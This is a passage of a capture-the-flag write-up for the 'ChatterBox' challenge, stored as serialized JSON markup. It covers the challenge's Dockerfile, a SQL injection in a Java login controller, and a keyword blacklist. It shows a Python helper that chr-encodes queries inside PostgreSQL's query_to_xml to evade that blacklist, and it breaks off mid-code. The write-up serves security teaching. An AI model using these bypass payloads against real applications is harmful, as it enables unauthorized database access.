[\"/start.sh\"]\n",[25264],{"type":33,"tag":105,"props":25265,"children":25266},{"__ignoreMap":8},[25267,25279,25286,25298,25306,25318,25330,25337,25349,25361,25368,25380,25391,25398,25410,25422,25434,25441,25453,25465,25477],{"type":33,"tag":128,"props":25268,"children":25269},{"class":130,"line":131},[25270,25274],{"type":33,"tag":128,"props":25271,"children":25272},{"style":1576},[25273],{"type":38,"value":22929},{"type":33,"tag":128,"props":25275,"children":25276},{"style":323},[25277],{"type":38,"value":25278}," openjdk:17-slim\n",{"type":33,"tag":128,"props":25280,"children":25281},{"class":130,"line":362},[25282],{"type":33,"tag":128,"props":25283,"children":25284},{"emptyLinePlaceholder":896},[25285],{"type":38,"value":899},{"type":33,"tag":128,"props":25287,"children":25288},{"class":130,"line":403},[25289,25293],{"type":33,"tag":128,"props":25290,"children":25291},{"style":1576},[25292],{"type":38,"value":22949},{"type":33,"tag":128,"props":25294,"children":25295},{"style":323},[25296],{"type":38,"value":25297}," apt update \\\n",{"type":33,"tag":128,"props":25299,"children":25300},{"class":130,"line":739},[25301],{"type":33,"tag":128,"props":25302,"children":25303},{"style":323},[25304],{"type":38,"value":25305}," && apt install -y postgresql postgresql-contrib uuid vim gcc postgresql-13 postgresql-server-dev-13 file procps && apt install sudo -y\n",{"type":33,"tag":128,"props":25307,"children":25308},{"class":130,"line":765},[25309,25313],{"type":33,"tag":128,"props":25310,"children":25311},{"style":1576},[25312],{"type":38,"value":22949},{"type":33,"tag":128,"props":25314,"children":25315},{"style":323},[25316],{"type":38,"value":25317}," apt install -y libfindbin-libs-perl acl haveged\n",{"type":33,"tag":128,"props":25319,"children":25320},{"class":130,"line":804},[25321,25325],{"type":33,"tag":128,"props":25322,"children":25323},{"style":1576},[25324],{"type":38,"value":22949},{"type":33,"tag":128,"props":25326,"children":25327},{"style":323},[25328],{"type":38,"value":25329}," mkdir -p /logs && touch /logs/myapp.log && chmod 777 /logs/ && chmod 777 /logs/myapp.log\n",{"type":33,"tag":128,"props":25331,"children":25332},{"class":130,"line":839},[25333],{"type":33,"tag":128,"props":25334,"children":25335},{"emptyLinePlaceholder":896},[25336],{"type":38,"value":899},{"type":33,"tag":128,"props":25338,"children":25339},{"class":130,"line":848},[25340,25344],{"type":33,"tag":128,"props":25341,"children":25342},{"style":1576},[25343],{"type":38,"value":23093},{"type":33,"tag":128,"props":25345,"children":25346},{"style":323},[25347],{"type":38,"value":25348}," init.sql /\n",{"type":33,"tag":128,"props":25350,"children":25351},{"class":130,"line":976},[25352,25356],{"type":33,"tag":128,"props":25353,"children":25354},{"style":1576},[25355],{"type":38,"value":23093},{"type":33,"tag":128,"props":25357,"children":25358},{"style":323},[25359],{"type":38,"value":25360}," payload.c /tmp/\n",{"type":33,"tag":128,"props":25362,"children":25363},{"class":130,"line":988},[25364],{"type":33,"tag":128,"props":25365,"children":25366},{"emptyLinePlaceholder":896},[25367],{"type":38,"value":899},{"type":33,"tag":128,"props":25369,"children":25370},{"class":130,"line":1001},[25371,25375],{"type":33,"tag":128,"props":25372,"children":25373},{"style":1576},[25374],{"type":38,"value":23137},{"type":33,"tag":128,"props":25376,"children":25377},{"style":323},[25378],{"type":38,"value":25379}," root\n",{"type":33,"tag":128,"props":25381,"children":25382},{"class":130,"line":1014},[25383,25387],{"type":33,"tag":128,"props":25384,"children":25385},{"style":1576},[25386],{"type":38,"value":23137},{"type":33,"tag":128,"props":25388,"children":25389},{"style":323},[25390],{"type":38,"value":25379},{"type":33,"tag":128,"props":25392,"children":25393},{"class":130,"line":1026},[25394],{"type":33,"tag":128,"props":25395,"children":25396},{"emptyLinePlaceholder":896},[25397],{"type":38,"value":899},{"type":33,"tag":128,"props":25399,"children":25400},{"class":130,"line":1038},[25401,25405],{"type":33,"tag":128,"props":25402,"children":25403},{"style":1576},[25404],{"type":38,"value":23093},{"type":33,"tag":128,"props":25406,"children":25407},{"style":323},[25408],{"type":38,"value":25409}," ChatterBox-0.0.1-SNAPSHOT.jar /\n",{"type":33,"tag":128,"props":25411,"children":25412},{"class":130,"line":1051},[25413,25417],{"type":33,"tag":128,"props":25414,"children":25415},{"style":1576},[25416],{"type":38,"value":23093},{"type":33,"tag":128,"props":25418,"children":25419},{"style":323},[25420],{"type":38,"value":25421}," readflag /\n",{"type":33,"tag":128,"props":25423,"children":25424},{"class":130,"line":1063},[25425,25429],{"type":33,"tag":128,"props":25426,"children":25427},{"style":1576},[25428],{"type":38,"value":23093},{"type":33,"tag":128,"props":25430,"children":25431},{"style":323},[25432],{"type":38,"value":25433}," flag /\n",{"type":33,"tag":128,"props":25435,"children":25436},{"class":130,"line":1076},[25437],{"type":33,"tag":128,"props":25438,"children":25439},{"emptyLinePlaceholder":896},[25440],{"type":38,"value":899},{"type":33,"tag":128,"props":25442,"children":25443},{"class":130,"line":1089},[25444,25448],{"type":33,"tag":128,"props":25445,"children":25446},{"style":1576},[25447],{"type":38,"value":22949},{"type":33,"tag":128,"props":25449,"children":25450},{"style":323},[25451],{"type":38,"value":25452}," chmod 000 /flag\n",{"type":33,"tag":128,"props":25454,"children":25455},{"class":130,"line":1101},[25456,25460],{"type":33,"tag":128,"props":25457,"children":25458},{"style":1576},[25459],{"type":38,"value":23093},{"type":33,"tag":128,"props":25461,"children":25462},{"style":323},[25463],{"type":38,"value":25464}," start.sh /\n",{"type":33,"tag":128,"props":25466,"children":25467},{"class":130,"line":1114},[25468,25472],{"type":33,"tag":128,"props":25469,"children":25470},{"style":1576},[25471],{"type":38,"value":22949},{"type":33,"tag":128,"props":25473,"children":25474},{"style":323},[25475],{"type":38,"value":25476}," chmod +x /start.sh\n",{"type":33,"tag":128,"props":25478,"children":25479},{"class":130,"line":1127},[25480,25484,25488,25493],{"type":33,"tag":128,"props":25481,"children":25482},{"style":1576},[25483],{"type":38,"value":23157},{"type":33,"tag":128,"props":25485,"children":25486},{"style":323},[25487],{"type":38,"value":718},{"type":33,"tag":128,"props":25489,"children":25490},{"style":140},[25491],{"type":38,"value":25492},"\"/start.sh\"",{"type":33,"tag":128,"props":25494,"children":25495},{"style":323},[25496],{"type":38,"value":3262},{"type":33,"tag":40,"props":25498,"children":25499},{"id":22881},[25500],{"type":38,"value":22884},{"type":33,"tag":75,"props":25502,"children":25504},{"imgSrc":25503,":width":1862},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558732/writeups/chatter-box/files_decompiled.webp",[],{"type":33,"tag":47,"props":25506,"children":25507},{},[25508],{"type":38,"value":25509},"After decompiling the .jar file, we can see that there are 3 controllers:",{"type":33,"tag":239,"props":25511,"children":25512},{},[25513,25518,25523],{"type":33,"tag":243,"props":25514,"children":25515},{},[25516],{"type":38,"value":25517},"LoginController: This controller allows a user to connect.",{"type":33,"tag":243,"props":25519,"children":25520},{},[25521],{"type":38,"value":25522},"MessageBoardController: Allows adding a message to the database and displaying the list of messages.",{"type":33,"tag":243,"props":25524,"children":25525},{},[25526,25528],{"type":38,"value":25527},"NotifyController: Allows rendering an html file via the filename passed as parameter ",{"type":33,"tag":105,"props":25529,"children":25531},{"className":25530},[],[25532],{"type":38,"value":25533},"fname",{"type":33,"tag":47,"props":25535,"children":25536},{},[25537],{"type":38,"value":25538},"In the initialization of the database, we can see that there is an admin user with the id 1. Once connected, this user is able to interact with the two controllers \"MessageBoardController\" and \"NotifyController\".",{"type":33,"tag":40,"props":25540,"children":25542},{"id":25541},"sql-injection",[25543],{"type":38,"value":25544},"SQL Injection",{"type":33,"tag":47,"props":25546,"children":25547},{},[25548],{"type":38,"value":25549},"By looking in detail at the Login controller, we can see that the endpoint allowing the user to connect contained an SQL injection.",{"type":33,"tag":114,"props":25551,"children":25553},{"lang":25552},"java",[25554],{"type":33,"tag":119,"props":25555,"children":25558},{"code":25556,"language":25552,"meta":8,"className":25557,"style":8},"String sql = \"SELECT id,passwd FROM message_users WHERE username = '\" + username + \"'\";\n","language-java shiki shiki-themes vitesse-dark",[25559],{"type":33,"tag":105,"props":25560,"children":25561},{"__ignoreMap":8},[25562],{"type":33,"tag":128,"props":25563,"children":25564},{"class":130,"line":131},[25565,25570,25575,25579,25583,25588,25592,25596,25601,25606,25610,25614,25618],{"type":33,"tag":128,"props":25566,"children":25567},{"style":323},[25568],{"type":38,"value":25569},"String",{"type":33,"tag":128,"props":25571,"children":25572},{"style":306},[25573],{"type":38,"value":25574}," sql",{"type":33,"tag":128,"props":25576,"children":25577},{"style":312},[25578],{"type":38,"value":5657},{"type":33,"tag":128,"props":25580,"children":25581},{"style":676},[25582],{"type":38,"value":679},{"type":33,"tag":128,"props":25584,"children":25585},{"style":140},[25586],{"type":38,"value":25587},"SELECT id,passwd FROM message_users WHERE username = '",{"type":33,"tag":128,"props":25589,"children":25590},{"style":676},[25591],{"type":38,"value":669},{"type":33,"tag":128,"props":25593,"children":25594},{"style":300},[25595],{"type":38,"value":8297},{"type":33,"tag":128,"props":25597,"children":25598},{"style":323},[25599],{"type":38,"value":25600}," username ",{"type":33,"tag":128,"props":25602,"children":25603},{"style":300},[25604],{"type":38,"value":25605},"+",{"type":33,"tag":128,"props":25607,"children":25608},{"style":676},[25609],{"type":38,"value":679},{"type":33,"tag":128,"props":25611,"children":25612},{"style":140},[25613],{"type":38,"value":6040},{"type":33,"tag":128,"props":25615,"children":25616},{"style":676},[25617],{"type":38,"value":669},{"type":33,"tag":128,"props":25619,"children":25620},{"style":312},[25621],{"type":38,"value":5676},{"type":33,"tag":47,"props":25623,"children":25624},{},[25625],{"type":38,"value":25626},"The only problem is that we have to bypass several checks:",{"type":33,"tag":75,"props":25628,"children":25630},{"imgSrc":25629},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558895/writeups/chatter-box/login_controller.webp",[],{"type":33,"tag":81,"props":25632,"children":25634},{"id":25633},"bypass-first-check-blacklist",[25635],{"type":38,"value":25636},"Bypass first check (blacklist)",{"type":33,"tag":47,"props":25638,"children":25639},{},[25640],{"type":38,"value":25641},"The first check is a blacklist check.",{"type":33,"tag":47,"props":25643,"children":25644},{},[25645],{"type":38,"value":25646},"The blacklist constitutes a large part of keywords usable in an injection.",{"type":33,"tag":114,"props":25648,"children":25650},{"lang":25649},"txt",[25651],{"type":33,"tag":119,"props":25652,"children":25654},{"code":25653},"\"SELECT\",\"UNION\",\"INSERT\",\"ALTER\",\"SLEEP\",\"DELETE\",\"--\",\";\",\"#\",\"&\",\"/*\",\"OR\",\"EXEC\",\"CREATE\",\"AND\",\"DROP\",\n\"DO\",\"COPY\",\"SET\",\"VACUUM\",\"SHOW\",\"CURSOR\",\"TRUNCATE\",\"CAST\",\"BEGIN\",\"PERFORM\",\"END\",\"CASE\",\"WHEN\",\"ALL\",\n\"TABLE\",\"UPDATE\",\"TRIGGER\",\"FUNCTION\",\"PROCEDURE\",\"DECLARE\",\"RETURNING\",\"TABLESPACE\",\"VIEW\",\"SEQUENCE\",\n\"INDEX\",\"LOCK\",\"GRANT\",\"REVOKE\",\"SAVEPOINT\",\"ROLLBACK\",\"IMPORT\",\"COMMIT\",\"PREPARE\",\"EXECUTE\",\"EXPLAIN\",\n\"ANALYZE\",\"DATABASE\",\"PASSWORD\",\"CONNECT\",\"DISCONNECT\",\"PG_SLEEP\",\"MERGE\",\"USING\",\"LIMIT\",\"OFFSET\",\"RETURN\",\n\"ESCAPE\",\"LIKE\",\"ILIKE\",\"RLIKE\",\"EXISTS\",\"BETWEEN\",\"IS\",\"NULL\",\"NOT\",\"GROUP\",\"BY\",\"HAVING\",\"ORDER\",\"WINDOW\",\n\"PARTITION\",\"OVER\",\"FOREIGN KEY\",\"REFERENCE\",\"RAISE\",\"LISTEN\",\"NOTIFY\",\"LOAD\",\"SECURITY\",\"OWNER\",\"RULE\",\n\"CLUSTER\",\"COMMENT\",\"CONVERT\",\"COPY\",\"CHECKPOINT\",\"REINDEX\",\"RESET\",\"LANGUAGE\",\"PLPGSQL\",\"PLPYTHON\",\n\"SECDEF\",\"NOCREATEDB\",\"NOCREATEROLE\",\"NOINHERIT\",\"NOREPLICATION\",\"BYPASSRLS\",\"FILE\",\"PG_\",\"IMPORT\",\"EXPORT\"\n",[25655],{"type":33,"tag":105,"props":25656,"children":25657},{"__ignoreMap":8},[25658],{"type":38,"value":25653},{"type":33,"tag":47,"props":25660,"children":25661},{},[25662],{"type":38,"value":25663},"One of the most restrictive things is that in the blacklist, it is forbidden to use comments.",{"type":33,"tag":47,"props":25665,"children":25666},{},[25667],{"type":38,"value":25668},"We need to use a postgresql function that would allow us to execute a query without it being in the blacklist.",{"type":33,"tag":75,"props":25670,"children":25672},{"imgSrc":25671},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558929/writeups/chatter-box/doc_query_to_xml.webp",[],{"type":33,"tag":47,"props":25674,"children":25675},{},[25676],{"type":38,"value":25677},"As shown in the postgresql documentation, the query_to_xml function allows you to execute a query passed as a parameter and return the result in xml format.",{"type":33,"tag":47,"props":25679,"children":25680},{},[25681],{"type":38,"value":25682},"And bingo !!! This function is not on the blacklist.",{"type":33,"tag":47,"props":25684,"children":25685},{},[25686],{"type":38,"value":25687},"For ease, here is a small python code that allows to generate a payload via a sql query. By encoding the request with CHR.",{"type":33,"tag":114,"props":25689,"children":25690},{"lang":10227},[25691],{"type":33,"tag":119,"props":25692,"children":25694},{"code":25693,"language":10227,"meta":8,"className":10231,"style":8},"def get_payload(query):\n payload_chr = [\"||\".join(f\"chr({ord(query[i])})\" for i in range(0, len(query)))][0]\n print(f\"'query_to_xml({payload_chr},true,true,'')'\")\n",[25695],{"type":33,"tag":105,"props":25696,"children":25697},{"__ignoreMap":8},[25698,25722,25870],{"type":33,"tag":128,"props":25699,"children":25700},{"class":130,"line":131},[25701,25705,25710,25714,25718],{"type":33,"tag":128,"props":25702,"children":25703},{"style":300},[25704],{"type":38,"value":10402},{"type":33,"tag":128,"props":25706,"children":25707},{"style":135},[25708],{"type":38,"value":25709}," get_payload",{"type":33,"tag":128,"props":25711,"children":25712},{"style":312},[25713],{"type":38,"value":5566},{"type":33,"tag":128,"props":25715,"children":25716},{"style":323},[25717],{"type":38,"value":5810},{"type":33,"tag":128,"props":25719,"children":25720},{"style":312},[25721],{"type":38,"value":10497},{"type":33,"tag":128,"props":25723,"children":25724},{"class":130,"line":362},[25725,25730,25734,25738,25742,25747,25751,25755,25760,25764,25768,25773,25777,25782,25786,25790,25794,25798,25803,25807,25812,25817,25822,25827,25832,25836,25840,25844,25849,25853,25857,25862,25866],{"type":33,"tag":128,"props":25726,"children":25727},{"style":323},[25728],{"type":38,"value":25729}," payload_chr ",{"type":33,"tag":128,"props":25731,"children":25732},{"style":312},[25733],{"type":38,"value":315},{"type":33,"tag":128,"props":25735,"children":25736},{"style":312},[25737],{"type":38,"value":718},{"type":33,"tag":128,"props":25739,"children":25740},{"style":676},[25741],{"type":38,"value":669},{"type":33,"tag":128,"props":25743,"children":25744},{"style":140},[25745],{"type":38,"value":25746},"||",{"type":33,"tag":128,"props":25748,"children":25749},{"style":676},[25750],{"type":38,"value":669},{"type":33,"tag":128,"props":25752,"children":25753},{"style":312},[25754],{"type":38,"value":215},{"type":33,"tag":128,"props":25756,"children":25757},{"style":323},[25758],{"type":38,"value":25759},"join",{"type":33,"tag":128,"props":25761,"children":25762},{"style":312},[25763],{"type":38,"value":5566},{"type":33,"tag":128,"props":25765,"children":25766},{"style":300},[25767],{"type":38,"value":11107},{"type":33,"tag":128,"props":25769,"children":25770},{"style":140},[25771],{"type":38,"value":25772},"\"chr(",{"type":33,"tag":128,"props":25774,"children":25775},{"style":151},[25776],{"type":38,"value":7246},{"type":33,"tag":128,"props":25778,"children":25779},{"style":437},[25780],{"type":38,"value":25781},"ord",{"type":33,"tag":128,"props":25783,"children":25784},{"style":312},[25785],{"type":38,"value":5566},{"type":33,"tag":128,"props":25787,"children":25788},{"style":323},[25789],{"type":38,"value":5810},{"type":33,"tag":128,"props":25791,"children":25792},{"style":312},[25793],{"type":38,"value":344},{"type":33,"tag":128,"props":25795,"children":25796},{"style":323},[25797],{"type":38,"value":6110},{"type":33,"tag":128,"props":25799,"children":25800},{"style":312},[25801],{"type":38,"value":25802},"])",{"type":33,"tag":128,"props":25804,"children":25805},{"style":151},[25806],{"type":38,"value":5730},{"type":33,"tag":128,"props":25808,"children":25809},{"style":140},[25810],{"type":38,"value":25811},")\"",{"type":33,"tag":128,"props":25813,"children":25814},{"style":1576},[25815],{"type":38,"value":25816}," for",{"type":33,"tag":128,"props":25818,"children":25819},{"style":323},[25820],{"type":38,"value":25821}," i ",{"type":33,"tag":128,"props":25823,"children":25824},{"style":1576},[25825],{"type":38,"value":25826},"in",{"type":33,"tag":128,"props":25828,"children":25829},{"style":437},[25830],{"type":38,"value":25831}," range",{"type":33,"tag":128,"props":25833,"children":25834},{"style":312},[25835],{"type":38,"value":5566},{"type":33,"tag":128,"props":25837,"children":25838},{"style":523},[25839],{"type":38,"value":10442},{"type":33,"tag":128,"props":25841,"children":25842},{"style":312},[25843],{"type":38,"value":5584},{"type":33,"tag":128,"props":25845,"children":25846},{"style":437},[25847],{"type":38,"value":25848}," len",{"type":33,"tag":128,"props":25850,"children":25851},{"style":312},[25852],{"type":38,"value":5566},{"type":33,"tag":128,"props":25854,"children":25855},{"style":323},[25856],{"type":38,"value":5810},{"type":33,"tag":128,"props":25858,"children":25859},{"style":312},[25860],{"type":38,"value":25861},")))][",{"type":33,"tag":128,"props":25863,"children":25864},{"style":523},[25865],{"type":38,"value":10442},{"type":33,"tag":128,"props":25867,"children":25868},{"style":312},[25869],{"type":38,"value":3262},{"type":33,"tag":128,"props":25871,"children":25872},{"class":130,"line":403},[25873,25877,25881,25885,25890,25894,25899,25903,25908],{"type":33,"tag":128,"props":25874,"children":25875},{"style":437},[25876],{"type":38,"value":10650},{"type":33,"tag":128,"props":25878,"children":25879},{"style":312},[25880],{"type":38,"value":5566},{"type":33,"tag":128,"props":25882,"children":25883},{"style":300},[25884],{"type":38,"value":11107},{"type":33,"tag":128,"props":25886,"children":25887},{"style":140},[25888],{"type":38,"value":25889},"\"'query_to_xml(",{"type":33,"tag":128,"props":25891,"children":25892},{"style":151},[25893],{"type":38,"value":7246},{"type":33,"tag":128,"props":25895,"children":25896},{"style":323},[25897],{"type":38,"value":25898},"payload_chr",{"type":33,"tag":128,"props":25900,"children":25901},{"style":151},[25902],{"type":38,"value":5730},{"type":33,"tag":128,"props":25904,"children":25905},{"style":140},[25906],{"type":38,"value":25907},",true,true,'')'\"",{"type":33,"tag":128,"props":25909,"children":25910},{"style":312},[25911],{"type":38,"value":2427},{"type":33,"tag":81,"props":25913,"children":25915},{"id":25914},"bypass-second-check",[25916],{"type":38,"value":25917},"Bypass second check",{"type":33,"tag":47,"props":25919,"children":25920},{},[25921],{"type":38,"value":25922},"So now we have a function that executes the query we want. But the problem now is that another check is applied after the blacklist.",{"type":33,"tag":47,"props":25924,"children":25925},{},[25926,25928,25934],{"type":38,"value":25927},"The second filter will call the ",{"type":33,"tag":105,"props":25929,"children":25931},{"className":25930},[],[25932],{"type":38,"value":25933},"parse",{"type":38,"value":25935}," function. This function will process a check depending on whether the query is of type 'select' or 'insert’.",{"type":33,"tag":114,"props":25937,"children":25938},{"lang":25552},[25939],{"type":33,"tag":119,"props":25940,"children":25942},{"code":25941,"language":25552,"meta":8,"className":25557,"style":8},"public static boolean parse(String sql) {\n try {\n CCJSqlParserManager parserManager = new CCJSqlParserManager();\n Statement statement = parserManager.parse(new StringReader(sql));\n if (statement instanceof Select) {\n return processSelect((Select)statement);\n } else {\n return statement instanceof Insert ? processInsert((Insert)statement) : false;\n }\n } catch (Exception var3) {\n var3.printStackTrace();\n throw new SQLException(\"SQL error\");\n }\n}\n",[25943],{"type":33,"tag":105,"props":25944,"children":25945},{"__ignoreMap":8},[25946,25986,25997,26027,26082,26116,26150,26165,26229,26236,26269,26290,26328,26335],{"type":33,"tag":128,"props":25947,"children":25948},{"class":130,"line":131},[25949,25954,25959,25964,25969,25973,25978,25982],{"type":33,"tag":128,"props":25950,"children":25951},{"style":300},[25952],{"type":38,"value":25953},"public",{"type":33,"tag":128,"props":25955,"children":25956},{"style":300},[25957],{"type":38,"value":25958}," static",{"type":33,"tag":128,"props":25960,"children":25961},{"style":300},[25962],{"type":38,"value":25963}," boolean",{"type":33,"tag":128,"props":25965,"children":25966},{"style":135},[25967],{"type":38,"value":25968}," parse",{"type":33,"tag":128,"props":25970,"children":25971},{"style":312},[25972],{"type":38,"value":5566},{"type":33,"tag":128,"props":25974,"children":25975},{"style":323},[25976],{"type":38,"value":25977},"String sql",{"type":33,"tag":128,"props":25979,"children":25980},{"style":312},[25981],{"type":38,"value":2966},{"type":33,"tag":128,"props":25983,"children":25984},{"style":312},[25985],{"type":38,"value":762},{"type":33,"tag":128,"props":25987,"children":25988},{"class":130,"line":362},[25989,25993],{"type":33,"tag":128,"props":25990,"children":25991},{"style":1576},[25992],{"type":38,"value":5684},{"type":33,"tag":128,"props":25994,"children":25995},{"style":312},[25996],{"type":38,"value":762},{"type":33,"tag":128,"props":25998,"children":25999},{"class":130,"line":403},[26000,26005,26010,26014,26018,26023],{"type":33,"tag":128,"props":26001,"children":26002},{"style":323},[26003],{"type":38,"value":26004}," CCJSqlParserManager",{"type":33,"tag":128,"props":26006,"children":26007},{"style":306},[26008],{"type":38,"value":26009}," parserManager",{"type":33,"tag":128,"props":26011,"children":26012},{"style":312},[26013],{"type":38,"value":5657},{"type":33,"tag":128,"props":26015,"children":26016},{"style":1576},[26017],{"type":38,"value":13061},{"type":33,"tag":128,"props":26019,"children":26020},{"style":135},[26021],{"type":38,"value":26022}," CCJSqlParserManager",{"type":33,"tag":128,"props":26024,"children":26025},{"style":312},[26026],{"type":38,"value":15496},{"type":33,"tag":128,"props":26028,"children":26029},{"class":130,"line":739},[26030,26035,26040,26044,26048,26052,26056,26060,26065,26070,26074,26078],{"type":33,"tag":128,"props":26031,"children":26032},{"style":323},[26033],{"type":38,"value":26034}," Statement",{"type":33,"tag":128,"props":26036,"children":26037},{"style":306},[26038],{"type":38,"value":26039}," statement",{"type":33,"tag":128,"props":26041,"children":26042},{"style":312},[26043],{"type":38,"value":5657},{"type":33,"tag":128,"props":26045,"children":26046},{"style":306},[26047],{"type":38,"value":26009},{"type":33,"tag":128,"props":26049,"children":26050},{"style":312},[26051],{"type":38,"value":215},{"type":33,"tag":128,"props":26053,"children":26054},{"style":135},[26055],{"type":38,"value":25933},{"type":33,"tag":128,"props":26057,"children":26058},{"style":312},[26059],{"type":38,"value":5566},{"type":33,"tag":128,"props":26061,"children":26062},{"style":1576},[26063],{"type":38,"value":26064},"new",{"type":33,"tag":128,"props":26066,"children":26067},{"style":135},[26068],{"type":38,"value":26069}," StringReader",{"type":33,"tag":128,"props":26071,"children":26072},{"style":312},[26073],{"type":38,"value":5566},{"type":33,"tag":128,"props":26075,"children":26076},{"style":323},[26077],{"type":38,"value":10492},{"type":33,"tag":128,"props":26079,"children":26080},{"style":312},[26081],{"type":38,"value":9722},{"type":33,"tag":128,"props":26083,"children":26084},{"class":130,"line":765},[26085,26089,26093,26098,26103,26108,26112],{"type":33,"tag":128,"props":26086,"children":26087},{"style":1576},[26088],{"type":38,"value":13561},{"type":33,"tag":128,"props":26090,"children":26091},{"style":312},[26092],{"type":38,"value":2852},{"type":33,"tag":128,"props":26094,"children":26095},{"style":323},[26096],{"type":38,"value":26097},"statement ",{"type":33,"tag":128,"props":26099,"children":26100},{"style":300},[26101],{"type":38,"value":26102},"instanceof",{"type":33,"tag":128,"props":26104,"children":26105},{"style":323},[26106],{"type":38,"value":26107}," Select",{"type":33,"tag":128,"props":26109,"children":26110},{"style":312},[26111],{"type":38,"value":2966},{"type":33,"tag":128,"props":26113,"children":26114},{"style":312},[26115],{"type":38,"value":762},{"type":33,"tag":128,"props":26117,"children":26118},{"class":130,"line":804},[26119,26123,26128,26132,26137,26141,26146],{"type":33,"tag":128,"props":26120,"children":26121},{"style":1576},[26122],{"type":38,"value":13615},{"type":33,"tag":128,"props":26124,"children":26125},{"style":135},[26126],{"type":38,"value":26127}," processSelect",{"type":33,"tag":128,"props":26129,"children":26130},{"style":312},[26131],{"type":38,"value":13071},{"type":33,"tag":128,"props":26133,"children":26134},{"style":323},[26135],{"type":38,"value":26136},"Select",{"type":33,"tag":128,"props":26138,"children":26139},{"style":312},[26140],{"type":38,"value":2966},{"type":33,"tag":128,"props":26142,"children":26143},{"style":323},[26144],{"type":38,"value":26145},"statement",{"type":33,"tag":128,"props":26147,"children":26148},{"style":312},[26149],{"type":38,"value":5815},{"type":33,"tag":128,"props":26151,"children":26152},{"class":130,"line":839},[26153,26157,26161],{"type":33,"tag":128,"props":26154,"children":26155},{"style":312},[26156],{"type":38,"value":17786},{"type":33,"tag":128,"props":26158,"children":26159},{"style":1576},[26160],{"type":38,"value":14269},{"type":33,"tag":128,"props":26162,"children":26163},{"style":312},[26164],{"type":38,"value":762},{"type":33,"tag":128,"props":26166,"children":26167},{"class":130,"line":848},[26168,26172,26177,26181,26186,26190,26195,26199,26204,26208,26212,26216,26221,26225],{"type":33,"tag":128,"props":26169,"children":26170},{"style":1576},[26171],{"type":38,"value":13615},{"type":33,"tag":128,"props":26173,"children":26174},{"style":323},[26175],{"type":38,"value":26176}," statement ",{"type":33,"tag":128,"props":26178,"children":26179},{"style":300},[26180],{"type":38,"value":26102},{"type":33,"tag":128,"props":26182,"children":26183},{"style":323},[26184],{"type":38,"value":26185}," Insert ",{"type":33,"tag":128,"props":26187,"children":26188},{"style":1576},[26189],{"type":38,"value":3755},{"type":33,"tag":128,"props":26191,"children":26192},{"style":135},[26193],{"type":38,"value":26194}," processInsert",{"type":33,"tag":128,"props":26196,"children":26197},{"style":312},[26198],{"type":38,"value":13071},{"type":33,"tag":128,"props":26200,"children":26201},{"style":323},[26202],{"type":38,"value":26203},"Insert",{"type":33,"tag":128,"props":26205,"children":26206},{"style":312},[26207],{"type":38,"value":2966},{"type":33,"tag":128,"props":26209,"children":26210},{"style":323},[26211],{"type":38,"value":26145},{"type":33,"tag":128,"props":26213,"children":26214},{"style":312},[26215],{"type":38,"value":2966},{"type":33,"tag":128,"props":26217,"children":26218},{"style":1576},[26219],{"type":38,"value":26220}," :",{"type":33,"tag":128,"props":26222,"children":26223},{"style":1576},[26224],{"type":38,"value":6721},{"type":33,"tag":128,"props":26226,"children":26227},{"style":312},[26228],{"type":38,"value":5676},{"type":33,"tag":128,"props":26230,"children":26231},{"class":130,"line":976},[26232],{"type":33,"tag":128,"props":26233,"children":26234},{"style":312},[26235],{"type":38,"value":13656},{"type":33,"tag":128,"props":26237,"children":26238},{"class":130,"line":988},[26239,26243,26247,26251,26256,26261,26265],{"type":33,"tag":128,"props":26240,"children":26241},{"style":312},[26242],{"type":38,"value":6850},{"type":33,"tag":128,"props":26244,"children":26245},{"style":1576},[26246],{"type":38,"value":6855},{"type":33,"tag":128,"props":26248,"children":26249},{"style":312},[26250],{"type":38,"value":2852},{"type":33,"tag":128,"props":26252,"children":26253},{"style":323},[26254],{"type":38,"value":26255},"Exception ",{"type":33,"tag":128,"props":26257,"children":26258},{"style":306},[26259],{"type":38,"value":26260},"var3",{"type":33,"tag":128,"props":26262,"children":26263},{"style":312},[26264],{"type":38,"value":2966},{"type":33,"tag":128,"props":26266,"children":26267},{"style":312},[26268],{"type":38,"value":762},{"type":33,"tag":128,"props":26270,"children":26271},{"class":130,"line":1001},[26272,26277,26281,26286],{"type":33,"tag":128,"props":26273,"children":26274},{"style":306},[26275],{"type":38,"value":26276}," var3",{"type":33,"tag":128,"props":26278,"children":26279},{"style":312},[26280],{"type":38,"value":215},{"type":33,"tag":128,"props":26282,"children":26283},{"style":135},[26284],{"type":38,"value":26285},"printStackTrace",{"type":33,"tag":128,"props":26287,"children":26288},{"style":312},[26289],{"type":38,"value":15496},{"type":33,"tag":128,"props":26291,"children":26292},{"class":130,"line":1014},[26293,26298,26302,26307,26311,26315,26320,26324],{"type":33,"tag":128,"props":26294,"children":26295},{"style":1576},[26296],{"type":38,"value":26297}," throw",{"type":33,"tag":128,"props":26299,"children":26300},{"style":1576},[26301],{"type":38,"value":13061},{"type":33,"tag":128,"props":26303,"children":26304},{"style":135},[26305],{"type":38,"value":26306}," SQLException",{"type":33,"tag":128,"props":26308,"children":26309},{"style":312},[26310],{"type":38,"value":5566},{"type":33,"tag":128,"props":26312,"children":26313},{"style":676},[26314],{"type":38,"value":669},{"type":33,"tag":128,"props":26316,"children":26317},{"style":140},[26318],{"type":38,"value":26319},"SQL error",{"type":33,"tag":128,"props":26321,"children":26322},{"style":676},[26323],{"type":38,"value":669},{"type":33,"tag":128,"props":26325,"children":26326},{"style":312},[26327],{"type":38,"value":5815},{"type":33,"tag":128,"props":26329,"children":26330},{"class":130,"line":1026},[26331],{"type":33,"tag":128,"props":26332,"children":26333},{"style":312},[26334],{"type":38,"value":845},{"type":33,"tag":128,"props":26336,"children":26337},{"class":130,"line":1038},[26338],{"type":33,"tag":128,"props":26339,"children":26340},{"style":312},[26341],{"type":38,"value":854},{"type":33,"tag":47,"props":26343,"children":26344},{},[26345],{"type":38,"value":26346},"In our case, it will process the select part of the request, verify that it is indeed an instance of plainselect, then check the from part which will verify that this part contains a table name.",{"type":33,"tag":114,"props":26348,"children":26349},{"lang":25552},[26350],{"type":33,"tag":119,"props":26351,"children":26353},{"code":26352,"language":25552,"meta":8,"className":25557,"style":8},"private static boolean processSelect(Select statement) {\n SelectBody selectBody = statement.getSelectBody();\n if (selectBody instanceof PlainSelect) {\n PlainSelect plainSelect = (PlainSelect)selectBody;\n FromItem fromItem = plainSelect.getFromItem();\n if (fromItem instanceof Table) {\n String tablename = ((Table)fromItem).getName();\n List\u003CString> 